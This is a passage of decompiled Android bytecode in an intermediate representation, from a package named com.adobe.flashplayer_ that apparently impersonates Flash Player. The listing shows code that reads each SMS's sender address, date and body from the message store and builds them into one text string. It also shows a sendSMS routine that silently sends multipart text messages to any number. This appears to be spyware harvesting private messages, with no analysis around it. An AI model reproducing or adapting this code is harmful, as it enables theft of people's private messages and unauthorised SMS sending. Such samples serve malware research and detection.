  #L038308.  call temp:= `append`(v3, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03830e.  v3:= temp @kind object;
  #L038310.  call temp:= `toString`(v3) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L038316.  v25:= temp @kind object;
  #L038318.  goto L038148;
  #L03831c.  v3:= "body" @kind object;
  #L038320.  v0:= v24 @kind object;
  #L038324.  call temp:= `getColumnIndex`(v0, v3) @signature `Landroid/database/Cursor;.getColumnIndex:(Ljava/lang/String;)I` @kind interface;
  #L03832a.  v3:= temp;
  #L03832c.  v0:= v24 @kind object;
  #L038330.  call temp:= `getString`(v0, v3) @signature `Landroid/database/Cursor;.getString:(I)Ljava/lang/String;` @kind interface;
  #L038336.  v23:= temp @kind object;
  #L038338.  v3:= "date" @kind object;
  #L03833c.  v0:= v24 @kind object;
  #L038340.  call temp:= `getColumnIndex`(v0, v3) @signature `Landroid/database/Cursor;.getColumnIndex:(Ljava/lang/String;)I` @kind interface;
  #L038346.  v3:= temp;
  #L038348.  v0:= v24 @kind object;
  #L03834c.  call temp:= `getLong`(v0, v3) @signature `Landroid/database/Cursor;.getLong:(I)J` @kind interface;
  #L038352.  v20:= temp @kind wide;
  #L038354.  v3:= "address" @kind object;
  #L038358.  v0:= v24 @kind object;
  #L03835c.  call temp:= `getColumnIndex`(v0, v3) @signature `Landroid/database/Cursor;.getColumnIndex:(Ljava/lang/String;)I` @kind interface;
  #L038362.  v3:= temp;
  #L038364.  v0:= v24 @kind object;
  #L038368.  call temp:= `getString`(v0, v3) @signature `Landroid/database/Cursor;.getString:(I)Ljava/lang/String;` @kind interface;
  #L03836e.  v29:= temp @kind object;
  #L038370.  v3:= new `java.lang.StringBuilder`;
  #L038374.  call temp:= `valueOf`(v27) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L03837a.  v5:= temp @kind object;
  #L03837c.  call `<init>`(v3, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L038382.  v0:= v29 @kind object;
  #L038386.  call temp:= `append`(v3, v0) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03838c.  v3:= temp @kind object;
  #L03838e.  v5:= "\r" @kind object;
  #L038392.  call temp:= `append`(v3, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L038398.  v3:= temp @kind object;
  #L03839a.  call temp:= `toString`(v3) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0383a0.  v27:= temp @kind object;
  #L0383a2.  v3:= new `java.lang.StringBuilder`;
  #L0383a6.  call temp:= `valueOf`(v27) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0383ac.  v5:= temp @kind object;
  #L0383ae.  call `<init>`(v3, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0383b4.  call temp:= `millisToDate`(v20) @signature `Lcom/adobe/flashplayer_/UniClass;.millisToDate:(J)Ljava/lang/String;` @kind static;
  #L0383ba.  v5:= temp @kind object;
  #L0383bc.  call temp:= `append`(v3, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0383c2.  v3:= temp @kind object;
  #L0383c4.  v5:= "\r" @kind object;
  #L0383c8.  call temp:= `append`(v3, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0383ce.  v3:= temp @kind object;
  #L0383d0.  call temp:= `toString`(v3) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0383d6.  v27:= temp @kind object;
  #L0383d8.  v3:= new `java.lang.StringBuilder`;
  #L0383dc.  call temp:= `valueOf`(v27) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0383e2.  v5:= temp @kind object;
  #L0383e4.  call `<init>`(v3, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0383ea.  v0:= v23 @kind object;
  #L0383ee.  call temp:= `append`(v3, v0) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0383f4.  v3:= temp @kind object;
  #L0383f6.  v5:= "\r\r" @kind object;
  #L0383fa.  call temp:= `append`(v3, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L038400.  v3:= temp @kind object;
  #L038402.  call temp:= `toString`(v3) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L038408.  v27:= temp @kind object;
  #L03840a.  goto L0381ba;
}
procedure `void` `sendSMS`(`com.adobe.flashplayer_.UniClass` v7 @kind this, `java.lang.String` v8 @kind object @name `n`, `java.lang.String` v9 @kind object @name `msg`) @signature `Lcom/adobe/flashplayer_/UniClass;.sendSMS:(Ljava/lang/String;Ljava/lang/String;)V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;

  #L038420.  v2:= 0I;
  #L038422.  v1:= v8 @kind object;
  #L038424.  v6:= v9 @kind object;
  #L038426.  call temp:= `getDefault`() @signature `Landroid/telephony/SmsManager;.getDefault:()Landroid/telephony/SmsManager;` @kind static;
  #L03842c.  v0:= temp @kind object;
  #L03842e.  call temp:= `divideMessage`(v0, v6) @signature `Landroid/telephony/SmsManager;.divideMessage:(Ljava/lang/String;)Ljava/util/ArrayList;` @kind virtual;
  #L038434.  v3:= temp @kind object;
  #L038436.  v4:= v2 @kind object;
  #L038438.  v5:= v2 @kind object;
  #L03843a.  call `sendMultipartTextMessage`(v0, v1, v2, v3, v4, v5) @signature `Landroid/telephony/SmsManager;.sendMultipartTextMessage:(Ljava/lang/String;Ljava/lang/String;Ljava/util/ArrayList;Ljava/util/ArrayList;Ljava/util/ArrayList;)V` @kind virtual;
  #L038440.  return @kind void;
}
